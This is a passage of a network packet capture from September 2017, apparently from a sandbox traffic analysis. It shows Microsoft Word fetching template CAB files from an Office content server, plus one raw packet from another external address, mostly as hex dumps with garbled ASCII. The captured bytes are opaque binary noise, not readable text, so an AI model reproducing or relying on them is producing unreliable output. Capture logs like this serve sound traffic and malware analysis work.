Sep 12, 2017 22:18:47.136639118 MESZ	80	49199	91.219.236.207	192.168.1.16	Data Raw: 88 af 00 00 00 0f 89 a9 00 00 00 41 bc e7 c0 8b 63 2c 0f 80 b8 00 00 00 0f 81 b2 00 00 00 72 0c 03 c0 85 c0 77 bf 76 bd 79 26 eb 29 55 72 38 73 36 d4 85 94 0f 8e 53 01 00 00 0f 8f 4d 01 00 00 cd 63 2d 4e c3 8b 63 2c 0f 88 60 01 00 00 0f 89 5a 01 Data Ascii: Ac,rwvy&)Ur8s6SMc-Nc,`Zq`tup5q3sqxyJ(u{P+:4fJG:Amcp-q+/	44
Sep 12, 2017 22:18:49.745071888 MESZ	49201	80	192.168.1.16	88.221.14.177	GET /support/templates/en-us/tp01793058.cab HTTP/1.1 X-Office-Version: 14.0.5128 User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro) Host: clienttemplates.content.office.net Connection: Keep-Alive Cache-Control: no-cache	544
Sep 12, 2017 22:18:49.745609045 MESZ	49202	80	192.168.1.16	88.221.14.177	GET /support/templates/en-us/tp01790492.cab HTTP/1.1 X-Office-Version: 14.0.5128 User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro) Host: clienttemplates.content.office.net Connection: Keep-Alive Cache-Control: no-cache	544
Sep 12, 2017 22:18:50.714673042 MESZ	80	49201	88.221.14.177	192.168.1.16	HTTP/1.1 200 OK Content-Length: 40682 Content-Type: application/vnd.ms-cab-compressed Content-MD5: l/wTeeOngokcFyVOgoye7A== Last-Modified: Fri, 22 Apr 2016 16:13:51 GMT ETag: 0x8D36AC9181ABF78 Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: e682945c-0001-0033-4230-6c0e4c000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Tue, 12 Sep 2017 20:18:50 GMT Connection: keep-alive Data Raw: 4d 53 43 46 00 00 00 00 da 5f 00 00 00 00 00 00 4c 00 00 00 00 00 00 00 03 01 02 00 02 00 04 00 00 00 00 00 14 00 00 00 00 00 10 00 da 5f 00 00 10 3f 00 00 00 00 00 00 00 00 00 00 84 00 00 00 02 00 03 12 c4 5e 00 00 01 00 03 12 d1 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4d 65 64 69 61 6e 2e 64 6f 74 78 00 fa 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 43 6f 6e 74 65 6e 74 2e 69 6e 66 00 5f b5 de 86 20 57 00 80 5b 80 80 8d 0e 10 10 2d 00 00 02 00 00 10 00 00 2e 00 dd c5 16 dc ee 2e 84 e0 17 2e 17 72 77 77 5d 62 90 dc 77 41 ee 62 2b 08 b9 bb bb 72 b8 bb 24 20 44 33 00 67 00 00 70 05 d1 fd fd 64 15 f5 97 7e 48 c0 0b c1 84 cf 14 bb 1a 0d 5a 86 1d a0 01 2a f0 64 b7 1b 73 c0 0e 54 8e bc 47 d2 3e 03 82 dd 6a de 7d 06 83 76 36 bf 18 02 68 a0 24 8e 01 1f 40 4c b8 70 29 e3 52 70 70 90 88 27 11 a5 55 34 0b 08 6f 98 a0 88 1d 60 37 e2 c1 fa 00 00 00 00 55 24 60 66 0e 46 9c f3 bc f7 3b f3 3d cf 86 77 d9 19 90 84 05 83 b7 a4 a2 56 42 d9 6b fd a1 f2 45 7f a9 a6 33 6c 7c 5d 8a 94 08 06 00 26 00 0c 00 10 a6 38 db 5b 64 af a0 f1 01 9b 00 00 76 40 54 3f 01 24 02 9c 7e a8 ca cc b9 d6 fb f3 ae e9 eb 0c 4a 8d 6d c5 8c ec f2 63 40 79 d2 24 1f 40 ff 79 eb 50 d7 fa 07 ad 1b 58 8a 44 24 23 64 2c 72 b7 ee 76 f7 ef 33 71 fc 1a 0e c1 02 eb 58 44 a7 b0 fa a1 0f d6 5a b7 fa 10 8c c3 5d 08 d4 9e 3b e1 ba c5 7a e2 b2 e2 a9 e8 ce ed 7d bc 0e 67 96 53 6f cd 8d fd c4 51 41 7a 0e 2f 49 5f aa e2 d8 ea 1f 0b df 05 1e 77 40 da de 81 d4 6e f1 78 cf d5 44 f5 16 3d fc 95 ce 23 ce 7c 8a 55 3a 91 8a 6b 88 e6 bc 34 d2 da 3b 99 68 77 15 4c 54 de 35 fa 0d a7 64 bc 5e 2d 3e 07 c9 5c bf 4c 96 66 76 dc 76 aa ae 54 5e 0b 9f 33 f5 05 22 63 26 84 53 c6 be 24 9c eb 97 31 87 b1 59 c6 1d a7 36 bb b6 ae ce 55 df a5 ab f5 60 2e e3 53 ba 20 33 b7 68 2f 55 e0 30 e0 68 e3 36 5c 82 d5 c2 c0 8e 41 5d 9e 51 5e 63 b6 cc 4b e9 6c 34 78 ae e9 34 ee 37 25 06 90 e8 64 0e 2f d3 ed 28 e7 d7 a2 9d 4a b8 1d 4d 5a 77 b5 a7 a8 a0 8e d1 74 70 d9 60 2e b7 13 4c 42 89 b8 46 ab fc b5 e3 35 cb 3a 50 36 99 13 3a e8 95 3e 8f a7 3e 3f 3d f1 63 7e 71 75 a6 16 a4 17 27 a5 ba be ca d9 a8 42 01 95 a0 56 75 9c 71 56 2f 39 0b aa 65 5a eb 95 5b 6e c2 6b 70 e3 ba 2e e5 d7 a6 77 9c 9b ca 60 31 31 80 2a f5 69 40 e8 41 0a 0f 1c 51 16 7c 2d 1d 5a a1 3e 89 a2 ee 78 ea 2b a0 c7 de 42 6a 6a 20 6f 98 28 67 63 ba 6b a5 14 3c 7c ad fe f1 ed 13 d5 0c 27 18 81 08 9d 4b eb da 73 88 e1 95 ce cb 0c 7f d5 86 23 4c ee 7c 9c 84 8c d8 8f 01 c7 a9 9d 6b 4c 61 25 c5 c6 5f 6d e2 9c 83 c7 e2 e3 66 78 1d fc d6 b1 5c 01 10 18 99 75 01 9b 41 61 24 c3 8c 57 af aa 9f e4 2f 67 f9 c0 6c 6a 62 9b 23 53 4d 93 a7 bb c1 54 e9 39 13 f9 d9 26 22 15 81 9f 7c b4 91 0a e4 05 6d dc 6f 43 e6 6a 74 b0 a9 e1 cd 81 6f f8 29 5e 38 55 b9 e7 bd c8 a2 05 98 75 f1 69 d2 3f 8d 3a 35 77 34 ec 95 c6 19 e6 68 21 1d 12 de 15 51 ba ad 35 e9 e2 57 15 cd e3 4b ed e5 d0 ee c8 be f1 41 e9 7d 39 5c 81 ea 72 4c 06 f1 4e 59 fa 7a a6 f5 62 2e 2b f3 27 ba ef ff 40 a4 92 d6 ee cb 21 58 a3 52 0f 1f f0 50 50 08 07 7d 0f 71 a5 a8 8d af b0 c8 fe 27 3f fc bb 1b 81 3a f5 27 ff 6e b9 b2 72 4d e5 fb 86 6f ff 45 a4 45 f9 85 Data Ascii: MSCF_L_?^Median.dotxContent.inf_ W[-...rww]bwAb+r$ D3gpd~HZdsTG>j}v6h$@Lp)Rpp'U4o`7U$`fF;=wVBkE3l\|]&8[dv@T?$~Jmc@y$@yPXD$#d,rv3qXDZ];z}gSoQAz/I_w@nxD=#\|U:k4;hwLT5d^->\LfvvT^3"c&S$1Y6U`.S 3h/U0h6\A]Q^cKl4x47%d/(JMZwtp`.LBF5:P6:>>?=c~qu'BVuqV/9eZ[nkp.w`11i@AQ\|-Z>x+Bjj o(gck<\|'Ks#L\|kLa%_mfx\uAa$W/gljb#SMT9&"\|moCjto)^8Uui?:5w4h!Q5WKA}9\rLNYzb.+'@!XRPP}q'?:'nrMoEE	718
Sep 12, 2017 22:18:50.714699030 MESZ	80	49201	88.221.14.177	192.168.1.16	Data Raw: c6 26 1c 25 83 8b 5b 0b 5f 84 29 8c 7e e8 04 84 c2 9a e3 5f 26 43 95 85 7c 4e 8b 93 f3 60 3b 3a 9e e8 ba 72 af c8 ad e2 e0 2a 47 d0 79 79 5c b7 e8 d3 00 73 12 cc 98 73 3e 75 77 34 6a 7a f2 55 5f b9 06 b2 8f b3 ef b3 a1 e6 8e 70 6d 91 bd 1b 39 41 Data Ascii: &%[_)~_&C\|N`;:r*Gyy\ss>uw4jzU_pm9ABw[Aua$2^;]ORWG7ivtJL-oqfwxhZ\|lh[si3746	718
Sep 12, 2017 22:18:50.715471029 MESZ	80	49201	88.221.14.177	192.168.1.16	Data Raw: 18 c1 d4 85 cf 88 55 e1 ae a3 59 34 04 34 79 e2 12 21 ac 8a 86 48 0f cb d6 d0 e0 02 fd 29 8f 27 b3 15 24 ae ee ca a3 de d0 79 83 c5 b4 0e 3f 49 70 42 b3 2a 2b f7 78 8a cb 47 83 58 63 a5 7e 07 a4 4c b6 a1 34 47 1a ce 2a 68 91 be b2 60 a5 4b 47 ed Data Ascii: UY44y!H)'$y?IpB+xGXc~L4Gh`KGEFB-,s%cL7P~[^),GJ~>+waJ^1P_04i3Efp\RQr6iW)V"lII1k[+~~Ko.@)7<"qF	720
Sep 12, 2017 22:18:50.715502977 MESZ	80	49201	88.221.14.177	192.168.1.16	Data Raw: b8 1d 32 bd b0 8e 0b bb f6 5a 09 e6 57 15 bf 50 59 92 bd b8 64 0a 1e 71 82 bc 1c 8e fd f6 c5 28 24 d9 38 37 62 d7 09 ca 77 23 d7 0c eb bf d8 34 f4 27 30 f2 8f a8 5d 13 e9 27 49 0e 1c c9 1a 2f ed a9 e0 c1 62 3d 8c b1 3a 1e ca b6 57 86 85 61 6d 24 Data Ascii: 2ZWPYdq($87bw#4'0]'I/b=:Wam$7a+\/nEE`n\|[c@n;E]j=y~Fe:4[fOTG\|_#]jlN4Y!8%S,<#c-:+&.A	721
Sep 12, 2017 22:18:50.715516090 MESZ	80	49201	88.221.14.177	192.168.1.16	Data Raw: a9 1d 7d fa 4a a1 ba 31 9b 72 88 e5 fc 71 c2 22 bb 32 9f 46 b3 55 b2 4a 19 5a 3b b0 75 2a ad 52 53 25 06 1d f3 93 f1 2c 59 1a 4b 90 4f 8d 4f 21 d8 4b 27 92 c8 34 12 5e 71 01 cf 1c da 3a 44 b5 b6 da 77 1d b0 5c f6 b7 20 fa 0a df 96 c8 fe fe 34 87 Data Ascii: }J1rq"2FUJZ;uRS%,YKOO!K'4^q:Dw\ 4yB"6aeJgHB FlWI[IZ[0<1LK}\|aI\|G<RFSmUXCXgX),_,$1+kL<id}PR\|s4)t5LCj?st	722
Sep 12, 2017 22:18:50.715861082 MESZ	80	49201	88.221.14.177	192.168.1.16	Data Raw: da b6 e4 b9 81 f2 b6 a4 55 d6 cc 9b 77 46 0f ea 89 83 4f c0 db 4d 69 17 1b e3 a8 36 90 88 f0 d6 dd e5 8e c0 a5 3d 72 9a af b4 00 be 75 01 c1 61 52 d0 06 24 e0 86 31 41 30 64 16 22 76 17 1f 64 16 e0 09 4d 67 17 f5 48 21 80 1d f3 22 0c 06 4f 1b 0c Data Ascii: UwFOMi6=ruaR$1A0d"vdMgH!"O:D3jX\$_^1e9BidO9FUAL \D`6e{"T()sCM\=JY;d5lz-#.#bou	723
Sep 12, 2017 22:18:50.730638981 MESZ	80	49201	88.221.14.177	192.168.1.16	Data Raw: fd eb f4 b0 a0 8d 2c 1d df b9 eb 69 03 59 fe c9 81 00 b9 30 bf 32 6c d8 bf 78 e8 33 d4 12 27 4e 1b 38 df 8a 2c d4 52 ea 43 3c 5a 61 be 4e ab 20 3b 31 00 c4 78 51 c0 d9 db b8 ad 88 8f e1 96 e0 75 14 b1 1f 44 f8 30 9c 0d 4c f9 fe d1 af dd d4 49 7f Data Ascii: ,iY02lx3'N8,RC<ZaN ;1xQuD0LI(+BsGte'?<w{Em+y.mZh4-e/\|/="Uk$Cs`ZhBc^Rr8GScCJ\|TbJx\|,{C'Stz\|5k~	724
Sep 12, 2017 22:18:50.730675936 MESZ	80	49201	88.221.14.177	192.168.1.16	Data Raw: 04 9d b7 10 aa 3b e6 8f c9 f2 2a c5 54 18 25 d0 7e 0b 80 5a 7f 72 26 47 c1 7e 9c df f1 5e 9a f2 c6 e4 6f 9a b4 6b 19 e8 8d 56 93 95 f7 1c 9d de 48 07 50 07 d4 c2 09 44 33 98 8e db 23 d0 8a bc 09 c2 13 31 dd f6 1e 08 1e 31 5f 9b 29 76 99 41 99 19 Data Ascii: ;*T%~Zr&G~^okVHPD3#11_)vAbwg{@UGPauyShtJ2H5+mTlL7`yU{Ie]([{UngMgR,99f[PR-2ZXvG\Q\|"jN<	726
Sep 12, 2017 22:18:50.730684042 MESZ	80	49201	88.221.14.177	192.168.1.16	Data Raw: 3a f9 9d 7d 36 8d 70 db 5b 14 72 68 6b 9e b4 cb 64 05 9c c4 a2 22 91 37 15 a5 e9 cc 1b 88 0c 4f ef fe b4 5e 34 13 00 8d b8 2f d8 6e 49 95 b3 fb 1e ae 1d d4 36 3f 28 05 9d 88 2e f1 00 8a 16 68 33 fa e9 d3 94 23 97 0d 18 5d 3c 32 9a 41 51 42 0f 25 Data Ascii: :}6p[rhkd"7O^4/nI6?(.h3#]<2AQB%3BZ:XduV>xmL1O2-MD<%!kKGT\|_})pgP!HSoe2,uoHr`>I^eP\Meuve^4of	727
Sep 12, 2017 22:18:50.756345987 MESZ	80	49201	88.221.14.177	192.168.1.16	Data Raw: 26 3c 3e ca 84 83 cf d1 39 e4 26 81 8c f2 c6 65 71 f7 a4 68 87 87 ce 2c 7b 16 5d e6 84 dc 7e 13 a2 f1 3d 8e 3e 56 68 60 ff 7b e6 b5 0a 25 94 73 83 77 17 5a 3b 45 14 85 9a 16 d7 f5 a5 a8 5d 84 a0 d2 1a d3 41 3a f2 61 e3 a1 90 a0 5e a9 3e 8f c0 90 Data Ascii: &<>9&eqh,{]~=>Vh`{%swZ;E]A:a^>"S=.'HYT(E5KQX"`ktzAEm #:9c!Y @xf,k8{$k{Z.FCad&	728
Sep 12, 2017 22:18:50.756388903 MESZ	80	49201	88.221.14.177	192.168.1.16	Data Raw: b8 a9 80 f1 d5 7a 65 8f 6e 84 c8 bb a9 89 1e 7d 4d 94 eb 4d b1 e0 3a ad 79 66 a9 ac eb 90 42 24 ea 44 d7 58 66 ef 8c da 06 4e 27 97 ea 4b 71 8c 51 47 b1 25 50 1c a0 09 44 b6 3f 0d 02 af 5e 9a dc cd 67 bb 1a d6 bf 14 2f e4 9d 98 cf 8c ce 75 e4 57 Data Ascii: zen}MM:yfB$DXfN'KqQG%PD?^g/uWuB``q.OK&_ZrrBBT&tP^SZ\M8$6w6w%Xp)>Hm}H#6tp\$3}RQk%dDQef JzZ#f:c	730
Sep 12, 2017 22:18:50.917608023 MESZ	80	49202	88.221.14.177	192.168.1.16	HTTP/1.1 200 OK Content-Length: 968004 Content-Type: application/vnd.ms-cab-compressed Content-MD5: YU006oUhuUAcqBWcYN6DCg== Last-Modified: Fri, 22 Apr 2016 16:13:49 GMT ETag: 0x8D36AC916B53052 Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 8f103993-0001-0037-1ed6-6bfbce000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Tue, 12 Sep 2017 20:18:50 GMT Connection: keep-alive Data Raw: 4d 53 43 46 00 00 00 00 34 86 0e 00 00 00 00 00 4c 00 00 00 00 00 00 00 03 01 02 00 02 00 04 00 00 00 00 00 14 00 00 00 00 00 10 00 34 86 0e 00 10 3f 00 00 00 00 00 00 00 00 00 00 88 00 00 00 1e 00 03 12 58 85 0e 00 01 00 03 12 91 f4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 53 6b 65 74 63 68 62 6f 6f 6b 2e 74 68 6d 78 00 0a 01 00 00 00 00 00 00 01 00 00 00 00 00 00 00 43 6f 6e 74 65 6e 74 2e 69 6e 66 00 7e c2 14 09 86 79 00 80 5b 80 80 8d 11 10 e0 5b 04 00 02 00 00 13 00 00 45 00 fd 14 a8 48 6a be af 14 df 97 95 06 23 41 10 5f 51 8d 05 5f c1 f7 54 a9 21 be f1 0a 2f 94 fb 82 d2 e0 7c 5f 23 be f0 0d 31 83 b6 b1 b6 cd 34 e1 55 44 70 56 00 00 47 00 dd 0e 72 05 2b 94 21 2a 20 57 ca 95 76 d1 41 af 9a da e9 0e 5a 3d d4 2e 7b d0 83 26 70 d9 c8 3e d9 13 fb a2 05 b9 cb 7d bf 82 e4 76 fb 89 21 b7 b0 27 f6 25 29 d2 20 eb 5c f6 b9 0f 1f 34 40 65 88 fb d9 47 5c 34 3d 90 a0 c9 a2 9c a8 0c 75 51 9f a2 10 e0 00 00 00 00 33 00 03 40 9c 40 d8 bd 8d 5d 26 71 13 54 5f 1a ff ff bf d8 0b f1 56 d2 2c 2b 95 e0 ca 6d 05 b7 9a 44 53 58 5d a0 8b db fb 3b a2 42 5d a3 ed d7 3e 70 b5 ed e6 62 b7 b7 f6 39 ae 3f 71 0d b5 e3 72 d8 41 63 6d 77 e2 6c cb 79 bc 36 22 89 a9 ad fd 57 ff fc fb b3 b6 68 5d 30 57 de c0 07 5c 29 74 91 2f a5 c6 67 21 af 55 78 a7 53 69 93 64 30 b5 30 b5 1b 5d d5 8e 68 62 a4 08 a4 68 2b d3 76 b6 17 60 45 6e 44 4b e2 cd 00 40 4e 6f aa 4a 58 17 11 a5 df 36 da 70 d3 cc 4b ed c8 39 35 68 67 67 99 d6 30 a2 59 08 fb 52 c7 fd 33 49 19 16 bf e6 d4 af 80 99 9b 97 a9 a6 cf e4 c3 8e f2 8c 34 e7 78 cd 27 c5 77 bc 72 05 76 38 1b 2e 34 e2 16 ce 3e 07 51 5f cb cd d2 9f 5c 8e ca e5 cb 28 9e a5 f2 38 60 3d 26 7c e3 d2 13 0a d8 cb e3 75 2f a7 47 61 14 f9 8b 87 a9 c7 19 3d 21 42 23 68 65 1f bf 46 b1 d2 18 c0 59 2d 7c 6c 94 33 b6 29 e7 47 b4 00 4e ef 65 c2 5d d1 4b c7 ea a4 5f 6b 89 c3 6b c2 c6 f3 53 f8 d5 33 fa c7 0f d9 96 39 18 52 ca 58 8f 5e 67 c2 5e 71 77 8f 73 60 a0 f9 d2 5b 2b 52 8d c8 c8 58 63 ef b7 e8 99 42 13 8e 99 5a 51 7f 84 e1 55 38 6f 7e 0d 54 4a bd 74 c2 0e 0c 3b 5d d8 1f df 4d a5 93 50 1d 0b c2 37 da c3 fb 64 5e 7a 96 4c 8d 62 ea 6a 53 1a 6d 74 dd ab 2c 4f e8 2e eb 1e f4 7c 9f b6 d2 74 71 57 ab 47 46 fe f6 bc 78 63 47 fc d2 d1 8a dd 5c 77 39 02 f6 34 d4 7e 4f dc 11 6a 90 99 38 94 da 51 33 d8 2b 18 1a 19 bb 03 95 b2 e7 06 ce 77 25 7e 6c c7 66 d9 53 1e fa 2c 5d 2b 93 47 ef 8f 69 14 ab 3b 83 84 b3 e8 6a c4 5f f1 31 ce 2b 92 07 d9 4f fe 7e f2 fe df 80 75 47 a2 12 c7 f9 2f da 9d 49 7f df fd 00 fc 7b dc 8e 0d 48 48 fb 3f a4 e4 cf 3d ad 40 7f 0f 2b 60 59 bf f2 cd c7 54 97 36 67 6c 42 69 d5 39 78 e2 4b 6f 71 78 3a 38 f9 39 d6 85 9a 6b d3 21 30 4e 31 aa dd bc f7 5d d7 03 ac d1 18 15 88 85 fb 34 9f a3 d0 13 5b 37 f4 46 30 b5 b8 f4 ae 2d ba 2c 76 bb d0 41 2e c9 47 d2 ae ac 52 69 9b aa 55 78 b5 ce 02 4b 5e 0c d1 ed 13 87 af 76 e2 64 7c 1b 3b cb 2c d0 47 65 72 e5 5e b3 26 a7 f9 8d 56 1d af d5 22 47 42 41 b6 2b 63 7f e8 90 47 a4 23 b9 50 ab de da 42 e8 69 73 ed d7 7f 2d 05 93 7c 9f 9b d5 f1 bc 31 c8 70 77 50 80 09 f1 aa d8 f5 96 ec dc de a5 bb 12 be d4 93 1c 0e ba 74 9a d2 fe 45 33 56 c9 91 9d Data Ascii: MSCF4L4?XSketchbook.thmxContent.inf~y[[EHj#A_Q_T!/\|_#14UDpVGr+!* WvAZ=.{&p>}v!'%) \4@eG\4=uQ3@@]&qT_V,+mDSX];B]>pb9?qrAcmwly6"Wh]0W\)t/g!UxSid00]hbh+v`EnDK@NoJX6pK95hgg0YR3I4x'wrv8.4>Q_\(8`=&\|u/Ga=!B#heFY-\|l3)GNe]K_kkS39RX^g^qws`[+RXcBZQU8o~TJt;]MP7d^zLbjSmt,O.\|tqWGFxcG\w94~Oj8Q3+w%~lfS,]+Gi;j_1+O~uG/I{HH?=@+`YT6glBi9xKoqx:89k!0N1]4[7F0-,vA.GRiUxK^vd\|;,Ger^&V"GBA+cG#PBis-\|1pwPtE3V	767
Sep 12, 2017 22:18:50.917617083 MESZ	80	49202	88.221.14.177	192.168.1.16	Data Raw: dd e6 8e eb ae 5d 55 69 ac 7d 30 ef 4d 29 e3 5b c6 51 9e d7 e8 50 3c b9 36 2d 83 fe ac bc ed fc 0b 3a c6 87 bb bb bd 54 b6 72 b9 58 ce 7d fc 24 55 de d4 ff ee 0e bf 8a 3f f7 ba ed 62 97 30 78 7f 1b fc 67 2f 43 4c fb ec cd 27 bd fe 16 c2 d6 36 07 Data Ascii: ]Ui}0M)[QP<6-:TrX}$U?b0xg/CL'6FYwg'[J*QO~QWVh_V_Pam;mwGa^XlY\|`18j~;Xn%3^\&337N	768
Sep 12, 2017 22:18:50.920710087 MESZ	80	49202	88.221.14.177	192.168.1.16	Data Raw: 81 3f 27 23 40 1b 89 8e 6d ea db a4 77 7a b2 db 33 f8 89 6f 5d 7b c2 ba 2c 1d 65 91 bd de e1 c1 e3 47 dd e0 c1 0b 0f 45 a2 27 7f f2 1c 60 74 db 6e 18 c8 82 8c b1 0f 4c 0f 0d 8f be fb ec 33 00 28 51 f3 61 3b 41 ce 29 47 41 0e e0 4b d1 82 ed fe 51 Data Ascii: ?'#@mwz3o]{,eGE'`tnL3(Qa;A)GAKQ5+{T^Xdfk_NS7n~Kwv;T<v3v\|yFp[:*N:\|g5)nDVCX>!3N[VHD77qNCoKQ	770
Sep 12, 2017 22:18:50.920747995 MESZ	80	49202	88.221.14.177	192.168.1.16	Data Raw: 54 60 25 95 d8 6a d9 3b 48 1e cd b4 1e a9 f8 04 81 9a 19 2b 16 48 74 30 03 e6 5e 3b 6b 76 ff 2f 35 9c 73 f5 a5 22 91 d5 9a 50 78 eb e7 f3 2e f1 73 a0 b6 1d 39 0b 59 7b 5a fe 11 ea ba dd 04 69 f7 ca 42 26 d2 ed 24 8e c6 68 d1 81 22 32 49 f8 9c d4 Data Ascii: T`%j;H+Ht0^;kv/5s"Px.s9Y{ZiB&$h"2I:kdHF&\|6el,0Ye.7Q}tbN*V?m3Rd"EORmlf2[ W\|mVyrrp?zrEH\|I>	772
Sep 12, 2017 22:18:50.920767069 MESZ	80	49202	88.221.14.177	192.168.1.16	Data Raw: 15 bb 2c 74 54 1c a1 ca 11 96 6c 14 67 75 16 0f bd 6c 76 56 4d 3c 92 aa fb 66 5d 36 f3 28 99 b6 1b 07 c9 e8 36 92 cd 74 70 86 86 89 b3 51 cd 01 17 83 fd f1 3e 35 2c 46 7e 60 2f 92 9b 1b b0 70 ea 95 38 db b7 78 24 db 5d e7 f2 ce dc 63 25 af d6 4c Data Ascii: ,tTlgulvVM<f]6(6tpQ>5,F~`/p8x$]c%LwvJuQ%DJX/-6kGs<mGEM$U'8j90v_6}M=`2i~\|IZKVE zArUL>2SaL^*_aV)wG<m!BO	773
Sep 12, 2017 22:18:50.935885906 MESZ	80	49202	88.221.14.177	192.168.1.16	Data Raw: 6a 68 ee 34 dd 3e 5f 8a 03 1e 71 88 f0 57 c8 48 dc 50 ab ae 85 8b 79 fc e1 51 20 dd 1e 4c 69 27 bb 17 d5 4d 9d ef 9b 53 f1 11 79 6f 1e 1d aa 57 2c e1 91 1f 7d 9b 8f dd 7e 89 8f 43 8f 72 f0 38 5e 3f 50 ad b7 d2 61 14 c2 c2 26 74 82 e7 be ba 7a 56 Data Ascii: jh4>_qWHPyQ Li'MSyoW,}~Cr8^?Pa&tzVW3C0zJK{shRGSt(gn\<4k3j[X~M0cQ^\</W{yBCbN6)Xxz\{uv}_7X$l	774
Sep 12, 2017 22:18:50.935924053 MESZ	80	49202	88.221.14.177	192.168.1.16	Data Raw: f2 f7 ea fa aa 9e 1b 5a 45 ef 17 ed 7b b9 61 9c e9 e7 e1 f7 7a e5 f1 ac 21 9a 0d b7 d9 67 cf 30 9b d5 43 5d 27 2f f5 1a e8 19 4d cb 86 d6 d6 81 2d a2 56 34 83 f7 46 41 a9 47 58 0a 9e fd 9c 3b 78 da 0e b3 4a 6f 23 7a 8b 8b 5d ef 4f b3 24 89 f2 f3 Data Ascii: ZE{az!g0C]'/M-V4FAGX;xJo#z]O$8YOzNFeV&Y;$n<)^n_e*+.nSNugf`:"IL'7hRZ;Yy!v8V^_nD>$yZx7E"YuCpl-fN	776
Sep 12, 2017 22:18:50.935933113 MESZ	80	49202	88.221.14.177	192.168.1.16	Data Raw: 52 7e 69 cd 3b a7 ac 1a 8a f5 1d 44 a2 2f 59 37 26 1a b2 81 6f 30 e8 4a e9 f3 83 38 d1 e0 a3 95 33 43 fc b2 dc 76 44 52 76 ba 10 b4 a8 b0 1b df 3a 6f 08 58 18 3d 4c 56 4c 6c 72 1f 49 8b 45 b4 ec 3a 7b 42 46 8f 7a 8a bf 9a 40 df 17 09 8b 16 89 45 Data Ascii: R~i;D/Y7&o0J83CvDRv:oX=LVLlrIE:{BFz@E1/{/Xkg>/c+<nt@UA`V/8\|ptek<,Op\|M~p!?Q$JV[zm,2)^n^rki7{I\1h<pPN$=-	777
Sep 12, 2017 22:18:50.936777115 MESZ	80	49202	88.221.14.177	192.168.1.16	Data Raw: 28 af b0 16 c8 1d ae d7 72 84 da a6 e3 36 4b 5f c3 6b d1 44 dc f2 b6 15 89 f5 f8 08 e3 97 ef a8 02 fb 06 1c 12 6e f0 6c 68 a5 1c 47 b4 b6 43 9f a9 b5 72 e0 95 72 b9 77 a4 af ef bf 02 f5 16 c5 d7 30 e1 fb df d0 e8 f8 82 8a 48 fd f5 0a 11 06 ce 2e Data Ascii: (r6K_kDnlhGCrrw0H.?g}G(;jyH'!:s!F+.DcB=\_^(dQ{.?NC!?2Lwm[X7#s=QdtPO/-?B;^?D>qwl7	778
Sep 12, 2017 22:18:50.936815023 MESZ	80	49202	88.221.14.177	192.168.1.16	Data Raw: b3 5c 28 35 6f 9c db ef 53 f1 6f ff b6 1f a6 11 a2 e8 c6 9c f8 85 a6 64 1d 6e fe c2 59 a2 5a d2 48 56 ae b3 6f 1e af a1 08 56 e7 a6 2c ec 2c 4f b1 e4 e0 b7 ff 71 4c e3 70 36 bd 3a 74 50 a9 42 7a f8 25 ef 24 0f c2 f7 2b 60 c6 91 2d cd 7f 54 4b 0b Data Ascii: \(5oSodnYZHVoV,,OqLp6:tPBz%$+`-TK9PXG&@xR8ON?]y>iI,}pWU\4^7 ?Cl#\&>m'Zemn\|"OS$-y./kM[y_"wmN;	780
Sep 12, 2017 22:18:50.936831951 MESZ	80	49202	88.221.14.177	192.168.1.16	Data Raw: f4 16 dc 4d 96 c0 ce ca 3e 20 c3 6b f6 96 bd 9d 67 23 af 22 dd c3 7f 7a 7f 29 c0 9f 1d ac 2d 53 af 99 cd c9 31 d8 78 d3 6b a7 a8 7c 74 69 8a a5 80 d2 5a 75 79 5e 6b 3e 10 d7 ae bb 03 f0 db df 20 51 36 ee 47 c1 57 43 34 5b 53 2f 3f 57 a2 a8 94 6e Data Ascii: M> kg#"z)-S1xk\|tiZuy^k> Q6GWC4[S/?WnZfc!zWl"Z&tNQfE) @x8q)cf*E3:kSIdt?Q&7@d&)s5{~^b\|bol`P:G	781
Sep 12, 2017 22:18:51.049160957 MESZ	49201	80	192.168.1.16	88.221.14.177	GET /support/templates/en-us/tp01793064.cab HTTP/1.1 X-Office-Version: 14.0.5128 User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Word 14.0.5128; Pro) Host: clienttemplates.content.office.net Connection: Keep-Alive Cache-Control: no-cache	814
Sep 12, 2017 22:18:52.382307053 MESZ	80	49201	88.221.14.177	192.168.1.16	HTTP/1.1 200 OK Content-Length: 41004 Content-Type: application/vnd.ms-cab-compressed Content-MD5: yubFuf8jSHjIlN4HsmH/xA== Last-Modified: Fri, 22 Apr 2016 16:13:53 GMT ETag: 0x8D36AC91980277A Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: 96eccb63-0001-001c-62de-df8f76000000 x-ms-version: 2009-09-19 x-ms-write-protection: false x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Tue, 12 Sep 2017 20:18:51 GMT Connection: keep-alive Data Raw: 4d 53 43 46 00 00 00 00 1c 61 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 02 00 04 00 00 00 00 00 14 00 00 00 00 00 10 00 1c 61 00 00 10 3f 00 00 00 00 00 00 00 00 00 00 7c 00 00 00 01 00 03 12 12 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 71 75 69 74 79 2e 64 6f 74 78 00 fa 00 00 00 12 7d 00 00 00 00 00 00 00 00 00 00 43 6f 6e 74 65 6e 74 2e 69 6e 66 00 ab 67 36 7d 98 60 0c 7e 5b 80 80 8d 07 10 c0 e0 00 00 02 00 00 10 00 00 2e 00 bb e0 04 17 dc 25 04 17 bb bb 22 88 ee ee ee ee 17 ee 77 77 21 76 77 77 76 77 c5 2e 20 d8 33 24 50 46 00 00 04 00 f7 60 b1 ad 6c fb fd 22 01 91 70 26 bc 12 b1 24 dc 40 0d 6a 13 de c0 6b 78 6c ae 0d fc 00 80 99 65 17 bf b9 22 57 b0 9e 3d 17 20 86 c8 7a e2 ad 50 10 01 74 00 4a 2e 